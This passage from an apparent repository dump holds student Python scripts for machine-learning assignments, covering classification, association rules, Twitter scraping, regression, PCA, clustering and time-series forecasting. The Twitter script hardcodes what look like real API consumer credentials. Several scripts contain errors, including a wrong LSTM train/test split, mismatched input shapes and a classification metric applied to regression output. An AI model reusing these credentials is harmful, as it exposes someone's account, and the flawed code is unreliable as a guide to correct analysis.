data.drop('Taxable.Income',axis = 1)\r\n\r\n##Oversampling to avoid any information loss and to deal with the bias\r\ndata.status.value_counts() # 0=476,1=124\r\nmajority_class = data[data.status == 0]\r\nminority_class = data[data.status == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 476, #to match majority class\r\n random_state = 123) #reproducible results\r\n\r\ndf_unsampled = pd.concat([majority_class,minority_class_unsampled])\r\ndf_unsampled.status.value_counts() # 0=476,1 =476\r\npd.crosstab(df_unsampled['Marital.Status'],df_unsampled.status).plot(kind = 'bar') #no bias\r\n\r\n#separating x and y variables\r\nX= df_unsampled.iloc[:,0:6]\r\nY= df_unsampled.iloc[:,-1]\r\n\r\n\r\n#splitting into test and train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.3,random_state = 42)\r\n\r\n#building Random forest classifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_jobs = 8,oob_score = True,n_estimators = 1500,criterion = 'entropy')\r\nmodel.fit(x_train,y_train) #fiting the model on training dataset\r\nmodel.classes_ #class labels\r\nmodel.n_classes_ #number oof levels in class variable\r\nmodel.n_features_ #nuber of features\r\n\r\nmodel.score(x_train,y_train) #1.0\r\nmodel.score(x_test,y_test) #1.0\r\n\r\n#storing results for original dataset\r\ndata['y_pred'] = model.predict(data.iloc[:,0:5])\r\n\r\n#calculating feature importances\r\nfea_imp = pd.DataFrame(model.feature_importances_,\r\n index = X.columns,\r\n columns = ['importance']).sort_values('importance',ascending = False)\r\n#taxable income gives 93% information\r\n\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.y_pred,data.status))\r\n\r\n#accuracy of model on original dataset\r\nnp.mean(data.y_pred == data.status) #1.0\r\n\r\n#accuracy of model on resampled dataset\r\nmodel.score(X,Y) #1.0\r\n" }, { "alpha_fraction": 0.7211394309997559, "alphanum_fraction": 0.7396301627159119, "avg_line_length": 35.71697998046875, "blob_id": "cba9d604356006a7c76c6a783936753655f93182", "content_id": "4776c8a5dd6783b8ac7d3cce29caf168318d86a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 130, "num_lines": 53, "path": "/Association Rules/books.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Created on Sat Sep 26 15:31:23 2020\r\n\r\n@author: Admin\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\nbooks= pd.read_csv('D:\\\\ML Docs\\\\Excelr\\\\Assignments\\\\Association rules\\\\book.csv')\r\nbooks\r\n\r\nfrequent_itemsets= apriori(books,min_support=0.05,use_colnames=True,max_len=3)\r\nfrequent_itemsets\r\n\r\nfrequent_itemsets=frequent_itemsets.sort_values('support',ascending=False,inplace= False)\r\n\r\nplt.figure(figsize=(25,10))\r\nplt.bar(x=list(range(1,11)),height=frequent_itemsets.support[1:11]);plt.xticks(list(range(1,11)),frequent_itemsets.itemsets[1:11])\r\nplt.xlabel('itemsets');plt.ylabel('support')\r\n\r\nrules= 
association_rules(frequent_itemsets,metric=\"lift\",min_threshold=1)\r\nrules1=rules.sort_values('lift',ascending=False,inplace=False)\r\n\r\n#removing redundancy\r\ndef slist(i):\r\n return (sorted(list(i))) #sort - to sort the string alphabetically\r\n\r\nconcat= rules1.antecedents.apply(slist) + rules1.consequents.apply(slist)\r\nconcat=concat.apply(sorted) #sort - to sort the string alphabetically\r\n\r\nrule_sets=list(concat) #converting concat to list from series\r\n\r\nuni_rule_sets= [list(m) for m in set(tuple(i) for i in rule_sets )] #set- to remove the duplicate elements\r\n\r\nindex_sets= []\r\nfor i in uni_rule_sets:\r\n index_sets.append(rule_sets.index(i))\r\n \r\n# getting rules without any redudancy \r\nrules_no_red = rules.iloc[index_sets,:]\r\n\r\n#sorting rules wrt lift associated with them\r\nrules_no_red.sort_values('lift',ascending= False).head()\r\n\r\n#persons who bought 'Italcook' also bought 'CookBks' and 'ArtBks'\r\n#persons buying 'GeogBks' and 'ChildBks' have bought 'Italcook'\r\n#perosns buying 'CookBks' also buy 'ItalBks' \r\n# and many more such rules can be made as per the mentioned in rules_no_red and giving offers or discounts to the audeience as per\r\n#the formed rules will yield the better profits" }, { "alpha_fraction": 0.573721170425415, "alphanum_fraction": 0.594115674495697, "avg_line_length": 29.15625, "blob_id": "8bf10a2c921c264e78f5c741629a5df00a514b80", "content_id": "40692d840b11fb4df6d38dee92a2561195edb265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "no_license", "max_line_length": 100, "num_lines": 96, "path": "/Text mining 1/twitter_practise.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 4 14:39:03 2020\r\n\r\n@author: Lenovo\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport warnings \r\nimport tweepy\r\nfrom wordcloud import WordCloud\r\nfrom textblob import TextBlob\r\n\r\n#authentication\r\nconsumer_key = \"e5er9Ba7ACWjxmkCSCEpdMTv2\"\r\nconsumer_secret = \"Qv1BfqtglOWoh3F7olX1G0Tsa2JbDuus7KEdSmJkGL1JMKpQwT\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\napi = tweepy.API(auth)\r\n\r\n#getting first 200 tweets\r\nuserID = 'realDonaldTrump'\r\ntweets = api.user_timeline(screen_name = userID,\r\n count = 200,\r\n include_rts = False,\r\n tweet_mode = 'extended'\r\n )\r\n\r\noldest = tweets[-1].id - 1\r\n\r\nall_tweets = []\r\nall_tweets.extend(tweets)\r\noldest_id = tweets[-1].id\r\nwhile True:\r\n tweets = api.user_timeline(screen_name = userID,\r\n count = 200,\r\n include_rts = False,\r\n max_id = oldest_id - 1,\r\n tweet_mode = 'extended'\r\n )\r\n if len(tweets) == 0:\r\n break\r\n oldest_id = tweets[-1].id\r\n all_tweets.extend(tweets)\r\n print('no. 
of tweets downloaded : {}'.format(len(all_tweets)))\r\n\r\n#data cleaning\r\nfrom pandas import DataFrame\r\nouttweets = [[tweet.id_str, \r\n tweet.created_at, \r\n tweet.favorite_count, \r\n tweet.retweet_count,\r\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\r\n for idx,tweet in enumerate(all_tweets)]\r\ndf = DataFrame(outtweets,columns=[\"id\",\"created_at\",\"favorite_count\",\"retweet_count\", \"text\"])\r\n\r\nimport re\r\ndef cleanUpTweet(txt):\r\n # Remove mentions\r\n txt = re.sub(r'@[A-Za-z0-9_]+', '', txt)\r\n # Remove hashtags\r\n txt = re.sub(r'#', '', txt)\r\n # Remove retweets:\r\n txt = re.sub(r'RT : ', '', txt)\r\n # Remove urls\r\n txt = re.sub(r'https?:\\/\\/[A-Za-z0-9\\.\\/]+', '', txt)\r\n txt.lower\r\n return txt\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\ncv = CountVectorizer(stop_words = 'english')\r\nwords = cv.fit_transform(df.text)\r\nsum_words = words.sum(axis=0)\r\n\r\nwords_freq = [(word, sum_words[0, i]) for word, i in cv.vocabulary_.items()]\r\nwords_freq = sorted(words_freq, key = lambda x: x[1], reverse = True)\r\nfrequency = pd.DataFrame(words_freq, columns=['word', 'freq'])\r\n\r\n#frequency plot\r\nfrequency.head(30).plot(x='word', y='freq', kind='bar', figsize=(15, 7), color = 'blue')\r\nplt.title(\"Most Frequently Occuring Words - Top 30\")\r\n#https, bjp, india, people ,modi\r\n\r\n#plotting wordcloud\r\nall_words = ' '.join([text for text in df['text']])\r\nfrom wordcloud import WordCloud\r\nwordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words)\r\nplt.title('Dhruv Rathee Tweet Analysis')\r\nplt.figure(figsize=(10, 7))\r\nplt.imshow(wordcloud, interpolation=\"bilinear\")\r\nplt.axis('off')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.6868746280670166, "alphanum_fraction": 0.7133607864379883, "avg_line_length": 22.623188018798828, "blob_id": "4a23c3fffaeb6a9eed69e3869a3ed1871787de11", "content_id": "43e2367a26fc587e8f7ed797822b56ecb11d449a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1699, "license_type": "no_license", "max_line_length": 148, "num_lines": 69, "path": "/Simple linear regression/salarydata.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 9 18:30:05 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.formula.api as smf\r\nimport scipy.stats as stats\r\n\r\n#importing dataset\r\ndf= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Simple linear regression\\Salary_Data.csv',encoding='ISO-8859-1')\r\ndf\r\n\r\ndf.columns\r\ndf.head()\r\ndf.tail()\r\n\r\ndf.info() #no null values\r\ndf.describe()\r\n\r\nplt.hist(df.YearsExperience) #Data not normal\r\nplt.plot(df.YearsExperience,'ro')\r\n\r\nplt.hist(df.Salary) #Data not normal\r\nplt.plot(df.Salary,'ro')\r\n\r\nprob_YE= stats.shapiro(df['YearsExperience'])\r\nprob_YE\r\n#pvalue=0.1033>0.05, data is normal\r\n\r\nprob_sal=stats.shapiro(df['Salary'])\r\nprob_sal\r\n#pvalue=0.015<0.05,data is not normal\r\n\r\ndf['Salary'].corr(df['YearsExperience'])\r\n#strong correlation 0.978\r\nnp.corrcoef(df['Salary'],df['YearsExperience'])\r\n\r\n#building model\r\nmodel1= smf.ols('Salary~YearsExperience',data=df).fit()\r\nmodel1.summary() #R-squared=0.957 ,strong 
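# Hedged follow-up to the twitter_practise script above: cleanUpTweet is
# defined there but never applied, and TextBlob is imported but unused; a few
# lines wire them in (df and cleanUpTweet reused from that script).
from textblob import TextBlob
df['text'] = df['text'].apply(cleanUpTweet)
df['polarity'] = df['text'].apply(lambda t: TextBlob(t).sentiment.polarity)
print(df['polarity'].describe())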
model\r\n\r\npred=model1.predict(pd.DataFrame(df['YearsExperience']))\r\npred\r\n\r\ndf['Predicted_Salary']= pred\r\ndf\r\n\r\n#residuals\r\nresid= pred-df['Salary']\r\nresid\r\n\r\n#finding standardized residuals\r\nstudent_resid=model1.resid_pearson\r\nstudent_resid\r\n\r\nplt.plot(student_resid,'ro');plt.axhline(y=0);plt.xlabel('Observed Values');plt.ylabel('standardized error')\r\n\r\n#best fit line of the model\r\nplt.scatter(df['YearsExperience'],df['Salary']);plt.plot(df['YearsExperience'],pred,color='blue');plt.xlabel('YearsExperience');plt.ylabel('Salary')\r\n\r\n#predicted vs Actual values\r\nplt.plot(pred,df['Salary'],'bo'); xlabel('Actual Salary');ylabel('Predicted Salary')\r\n" }, { "alpha_fraction": 0.6633303165435791, "alphanum_fraction": 0.6892629861831665, "avg_line_length": 22.69662857055664, "blob_id": "b5314ce4df245b7ac2de458eb3d483b9601ebf92", "content_id": "fdd324053fa91171f38775a836ec2ba2d0ddcbf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 115, "num_lines": 89, "path": "/PCA/PCA_assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 25 12:57:13 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#EDA\r\ndata=pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\PCA\\\\wine.csv')\r\ndata.describe()\r\ndata.info()\r\ndata.columns\r\ndata.shape\r\ndata.Type.value_counts()\r\n\r\n\r\n#Data Preprocessing\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata['Type']=number.fit_transform(data['Type'])\r\n\r\ndef norm_func(i):\r\n x= (i-i.min())/(i.max()-i.min())\r\n return(x)\r\n\r\ndata.iloc[:,1:]=norm_func(data.iloc[:,1:])\r\n\r\n#PCA\r\nfrom sklearn.decomposition import PCA\r\npca=PCA()\r\npca_values=pca.fit_transform(data)\r\n\r\n#amount of variance explained by each component\r\nvar= pca.explained_variance_ratio_\r\nvar\r\npca.components_\r\n\r\nplt.plot(var) \r\n\r\n#cumulative sum if variances in %\r\nvar1=np.cumsum(np.round(var,decimals=3)*100) # we can use upto 7 PC's to get 95.1% information about data\r\nplt.plot(var1,'co-')\r\n\r\nx=pca_values[:,0]\r\ny=pca_values[:,1]\r\nz=pca_values[:,2]\r\nplt.scatter(x,y);plt.xlabel('PC1');plt.ylabel('PC2') #no correlation\r\n\r\ndf1=pd.DataFrame(pca_values[:,:3])\r\n\r\n#clustering on original dataset\r\ndata2=data.iloc[:,1:] #omitting first column \r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n kmeans=KMeans(n_clusters=i,init='k-means++',random_state=42)\r\n kmeans.fit(data2)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'co-')\r\n# optimum number of cluster=3\r\n\r\n\r\n####Clustering on using first 3 principal component scores####\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n kmeans=KMeans(n_clusters=i,init='k-means++',random_state=42)\r\n kmeans.fit(df1)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');plt.title('Scree Plot')\r\n#optimum number of cluster = 3\r\n\r\n\r\nimport scipy.cluster.hierarchy as sch\r\nz= sch.linkage(df1,method='ward',metric='euclidean')\r\nsch.dendrogram(z);plt.title('dendrogram')\r\n\r\n\r\n\r\n####hence, we have obtained same number of clusters with the original data and the first three primcipal components\r\n#(class column we have 
ignored at the begining who shows it has 3 clusters)df\r\n" }, { "alpha_fraction": 0.649193525314331, "alphanum_fraction": 0.6783154010772705, "avg_line_length": 29.67375946044922, "blob_id": "cd1f908026a0954fc9794762c8c4f4e6cf642e1a", "content_id": "f8242401f530619399cc952f05211334c75c084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4464, "license_type": "no_license", "max_line_length": 105, "num_lines": 141, "path": "/Forecasting/airlines LSTM.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 26 08:58:35 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\Airlines_Data.xlsx')\r\ndf.head()\r\ndf.columns\r\n\r\ndf1 = df.reset_index()['Passengers']\r\n\r\ndf1.shape\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(df1)\r\n\r\n\r\n#LSTM values are sensitive to scale of data so we apply minmaxscaler\r\nimport numpy as np\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nscaler = MinMaxScaler(feature_range=(0,1))\r\ndf1 = scaler.fit_transform(np.array(df1).reshape(-1,1))\r\n\r\ndf1.shape\r\n\r\n#train test split for time series data in ordered manner\r\ntrain_size = int(len(df1)*0.65) #output should be integer value not float\r\ntest_size = len(df1)-train_size\r\ntrain_data, test_data = df1[0:train_size,:], df1[0:test_size,:]\r\n\r\n#converting data into dependent and independant using timesteps\r\n#convert an array of values into dataset matrix\r\ndef create_dataset(dataset, time_step = 1):\r\n dataX, dataY = [],[]\r\n for i in range(len(dataset)-time_step-1):\r\n a=dataset[i:(i+time_step),0] ###i=0, 0,1,2,3-----99 100 \r\n dataX.append(a)\r\n dataY.append(dataset[i+time_step,0])\r\n return np.array(dataX), np.array(dataY)\r\n\r\ntime_step = 10\r\nx_train,y_train = create_dataset(train_data,time_step)\r\nx_test, y_test = create_dataset(test_data,time_step)\r\n\r\nprint(x_train.shape)\r\nprint(y_train.shape)\r\n\r\n#for LSTM model, x data needs to be in 3 dimensions[samples, timestep, festures]\r\nx_train = x_train.reshape(x_train.shape[0], x_train.shape[1], 1)\r\nx_test = x_test.reshape(x_test.shape[0],x_test.shape[1], 1)\r\n\r\n#importing tf libarries for stacked LSTM\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import LSTM\r\n\r\n#create an stacked LSTM model\r\nmodel = Sequential()\r\nmodel.add(LSTM(50,return_sequences=True, input_shape = (100,1))) #(timestep, feature)\r\nmodel.add(LSTM(50,return_sequences=True))\r\nmodel.add(LSTM(50))\r\nmodel.add(Dense(1))\r\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\r\n\r\nmodel.summary()\r\n\r\nmodel.fit(x_train, y_train, validation_data = (x_test, y_test), epochs = 200, batch_size=64, verbose = 1)\r\n\r\n#predicting the results\r\ntrain_predict = model.predict(x_train)\r\ntest_predict = model.predict(x_test)\r\n\r\n#rescaling the data to original form to get the desired results\r\ntrain_predict = scaler.inverse_transform(train_predict)\r\ntest_predict = scaler.inverse_transform((test_predict))\r\n\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error, accuracy_score\r\nmath.sqrt(mean_squared_error(y_train, train_predict)) #182.700\r\nprint(accuracy_score(y_train, train_predict))\r\nmath.sqrt(mean_squared_error(y_test, test_predict)) #151.947\r\n\r\n### Plotting \r\n# shift train 
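# Hedged illustration of the create_dataset windowing used above, run on a toy
# array with time_step=3, independent of the model code (create_dataset itself
# is reused from this script):
import numpy as np
toy = np.arange(10).reshape(-1, 1)
Xw, yw = create_dataset(toy, time_step=3)
print(Xw[:2])   # [[0 1 2], [1 2 3]]
print(yw[:2])   # [3 4]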
predictions for plotting\r\nimport numpy\r\nlook_back=10\r\ntrainPredictPlot = numpy.empty_like(df1)\r\ntrainPredictPlot[:, :] = np.nan\r\ntrainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(df1)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[len(train_predict)+(look_back*2)+1:len(df1)-1, :] = test_predict\r\n# plot baseline and predictions\r\nplt.plot(scaler.inverse_transform(df1))\r\nplt.plot(trainPredictPlot)\r\nplt.plot(testPredictPlot)\r\nplt.show()\r\n\r\n#since, time_step =100, to predict the prices for next 30 days, we have to take values from last 100 days\r\nx_input=test_data[86:].reshape(1,-1)\r\nx_input.shape\r\n\r\ntemp_input=list(x_input)\r\ntemp_input=temp_input[0].tolist()\r\n\r\nfrom numpy import array\r\n\r\nlst_output=[]\r\nn_steps=100\r\ni=0\r\nwhile(i<30):\r\n \r\n if(len(temp_input)>100):\r\n #print(temp_input)\r\n x_input=np.array(temp_input[1:])\r\n print(\"{} day input {}\".format(i,x_input))\r\n x_input=x_input.reshape(1,-1)\r\n x_input = x_input.reshape((1, n_steps, 1))\r\n #print(x_input)\r\n yhat = model.predict(x_input, verbose=0)\r\n print(\"{} day output {}\".format(i,yhat))\r\n temp_input.extend(yhat[0].tolist())\r\n temp_input=temp_input[1:]\r\n #print(temp_input)\r\n lst_output.extend(yhat.tolist())\r\n i=i+1\r\n else:\r\n x_input = x_input.reshape((1, n_steps,1))\r\n yhat = model.predict(x_input, verbose=0)\r\n print(yhat[0])\r\n temp_input.extend(yhat[0].tolist())\r\n print(len(temp_input))\r\n lst_output.extend(yhat.tolist())\r\n i=i+1\r\n \r\n\r\nprint(lst_output)" }, { "alpha_fraction": 0.6617318391799927, "alphanum_fraction": 0.6832402348518372, "avg_line_length": 29.36842155456543, "blob_id": "715ab2a36793e3021031b5e0d08f7bc1f9133825", "content_id": "4fbbdb9a4c2518fce950b966532f5c9f4dc379b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3580, "license_type": "no_license", "max_line_length": 111, "num_lines": 114, "path": "/Forecasting/cocacola.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 1 11:17:08 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\CocaCola_Sales_Rawdata.xlsx')\r\ndf.head()\r\ndf.tail()\r\n\r\nimport seaborn as sns\r\nsns.boxplot(df['Sales'])\r\n\r\ndf.set_index(['Quarter'], inplace = True)\r\ndf.dtypes\r\ndf.head()\r\ndf.describe()\r\n\r\ndf.plot();plt.xlabel('Quarter');plt.ylabel('sales')\r\n#upward trend with addiive seasonality and non-stationary\r\n\r\n#rolling statistics\r\nrol_mean = df.rolling(window = 4).mean()\r\nrol_sd = df.rolling(window = 4).std()\r\n\r\n#plotting the data\r\nplt.plot(df, label = 'original data')\r\nplt.plot(rol_mean, color='red', label= 'rolling mean')\r\nplt.plot(rol_sd, color = 'black',label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\n#augmented dickey-fuller test for stationarity\r\n#H0- not sationary\r\n#Ha - stationary\r\nfrom statsmodels.tsa.stattools import adfuller\r\ntest = adfuller(df['Sales'])\r\ndfoutput = pd.Series(test[0:4], index = ['Test statistic', 'P-value','Lags used', 'No. 
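# Hedged rewrite of the 30-step recursive forecast above as a compact loop.
# model, test_data and scaler are reused from this script; `win` must equal
# the time_step the network was actually trained with (the script mixes 10
# and 100, which needs reconciling before this runs).
import numpy as np
win = 10
window = list(test_data[-win:].reshape(-1))
preds = []
for _ in range(30):
    x_in = np.array(window[-win:]).reshape(1, win, 1)
    yhat = model.predict(x_in, verbose=0)[0, 0]
    preds.append(yhat)
    window.append(yhat)
print(scaler.inverse_transform(np.array(preds).reshape(-1, 1))[:5])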
of observations'])\r\nfor key,value in test[4].items():\r\n    dfoutput['critical value (%s)'%key] = value\r\nif dfoutput[1] <=0.05:\r\n    print('strong evidence against null hypothesis (H0), reject null hypothesis, data is stationary')\r\nelse:\r\n    print('weak evidence against null hypothesis (H0), fail to reject H0, data is not stationary')\r\nprint(dfoutput)\r\n# p-value is high (>0.05), fail to reject H0, data is not stationary\r\n\r\n#defining adfuller test function\r\ndef ts_adfuller(ts):\r\n    from statsmodels.tsa.stattools import adfuller\r\n    test1 = adfuller(ts['Sales'])\r\n    dfoutput1 = pd.Series(test1[0:4], index = ['Test statistic', 'P-value','Lags used', 'No. of observations'])\r\n    for key,value in test1[4].items():\r\n        dfoutput1['critical value (%s)'%key] = value\r\n    if dfoutput1[1] <=0.05:\r\n        print('strong evidence against null hypothesis (H0), reject null hypothesis, data is stationary')\r\n    else:\r\n        print('weak evidence against null hypothesis (H0), fail to reject H0, data is not stationary')\r\n    print(dfoutput1)\r\n    \r\ndfshifted = df - df.shift(4)\r\ndfshifted\r\ndfshifted.dropna(inplace = True)\r\nts_adfuller(dfshifted)\r\n#data is almost stationary\r\n\r\nplt.plot(dfshifted)\r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nresult = seasonal_decompose(df, model = 'additive', period = 12)\r\ntrend = result.trend\r\nseasonal = result.seasonal\r\nresidual = result.resid\r\n\r\nplt.subplot(411)\r\nplt.plot(df, label = 'original')\r\nplt.legend(loc = 'best')\r\nplt.subplot(412)\r\nplt.plot(trend, label = 'trend')\r\nplt.legend(loc = 'best')\r\nplt.subplot(413)\r\nplt.plot(seasonal, label = 'seasonality')\r\nplt.legend(loc = 'best')\r\nplt.subplot(414)\r\nplt.plot(residual, label = 'residuals')\r\nplt.legend(loc = 'best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#from graph, residuals are not stationary\r\n\r\n\r\n#determining p and q from the ACF and PACF plots\r\nfrom statsmodels.tsa.stattools import acf,pacf\r\nacf_df = acf(df,nlags = 20, fft = False)\r\nacf_pacf = pacf(df,nlags = 20,method = 'ols')\r\n\r\nplt.plot(acf_df)\r\nplt.axhline(y= 0, linestyle = '--')\r\nplt.axhline(y = -1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.title('Autocorrelation plot with confidence intervals')\r\nplt.show()\r\n\r\nplt.plot(acf_pacf)\r\nplt.axhline(y= 0, linestyle = '--')\r\nplt.axhline(y = -1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.title('Partial Autocorrelation plot with confidence intervals')\r\nplt.show()\r\n\r\n\r\n" }, { "alpha_fraction": 0.6487414240837097, "alphanum_fraction": 0.678947389125824, "avg_line_length": 40.019229888916016, "blob_id": "425dc21bd5c3b67ca0979c63a18b0d818890a259", "content_id": "4050a152744e63020c424b334d7d6025393562b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4370, "license_type": "no_license", "max_line_length": 169, "num_lines": 104, "path": "/Clustering/Airlines data.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 01 13:09:26 2021\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nairlines=pd.read_excel('E:\\Tej\\Assignments\\Asgnmnt\\Clustering\\EastWestAirlines.xlsx',sheet_name='data')\r\nairlines\r\nairlines.info()\r\n\r\ndef norm_func(i):\r\n    x= (i-i.min())/(i.max()-i.min())\r\n    
return(x)\r\n\ny=norm_func(airlines.iloc[:,[1,6,7,8,9]])\r\n\nz=airlines.iloc[:,[2,3,4,5,10,11]]\r\n\ndata=pd.concat([y,z],axis=1)\r\n\ndata.replace(np.nan,0,inplace= True)\r\ndata.info()\r\ndata.describe()\r\n\n####K-means Clustering####\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n    kmeans=KMeans(n_clusters= i,init='k-means++',random_state=42)\r\n    kmeans.fit(data)\r\n    wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');\r\nplt.xlabel('No. of Clusters');\r\nplt.ylabel('wcss');\r\nplt.title('Scree plot')\r\n#from 4 the curve starts flattening, therefore we choose 4 as the optimum no. of clusters\r\n\nkmeans_f=KMeans(n_clusters=4,init='k-means++',random_state=42)\r\ny_kmeans=kmeans_f.fit_predict(data) \r\ny_kmeans\r\ndata['cluster']=kmeans_f.labels_\r\nairlines['cluster']=kmeans_f.labels_\r\nairlines.cluster.value_counts()\r\n#cluster 0 is a small group of premium customers (53)\r\n#clusters 2 & 3 consist of middle-spending customers\r\n#cluster 1 has the least-spending customers\r\n\ncluster1= data.loc[y_kmeans == 0]\r\ncluster2= data.loc[y_kmeans == 1]\r\ncluster3= data.loc[y_kmeans == 2]\r\ncluster4= data.loc[y_kmeans == 3]\r\n \nsns.barplot(x='cluster',y='Balance',data=airlines) #order=1,3,2,0 lowest to highest\r\nsns.barplot(x='cluster',y='Qual_miles',data=airlines) #order=1,3,2,0 \r\nsns.barplot(x='cluster',y='cc1_miles',data=airlines) #order=1,0,3,2\r\nsns.barplot(x='cluster',y='cc2_miles',data=airlines) \r\nsns.barplot(x='cluster',y='cc3_miles',data=airlines) \r\nsns.barplot(x='cluster',y='Bonus_miles',data=airlines) #order=1,3,0,2\r\nsns.barplot(x='cluster',y='Bonus_trans',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Flight_miles_12mo',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Flight_trans_12',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Days_since_enroll',data=airlines) #order=1,0,3,2\r\nsns.barplot(x='cluster',y='Award?',data=airlines) #order=1,3,2,0\r\n#cluster 0 is the high-spending cluster, as it has the highest number of miles eligible for free travel and rewards, along with the other parameters\r\n#clusters 2 & 3 are middle-spending clusters with average balance, rewards and offers.\r\n#cluster 1 holds the least-spending customers, with the least flight miles and miles eligible for free travel\r\n#customers in clusters 2 & 3 are enrolled for longer than the others, and cluster 0 is in the middle of 1 and 2-3.\r\n#customers in cluster 0 have received the most awards due to their high spending, and those in cluster 1 have received the least.\r\n#for customers with the least flight transactions (cluster 1), discounted fare rates should be given to increase their spending and to make them stick to the 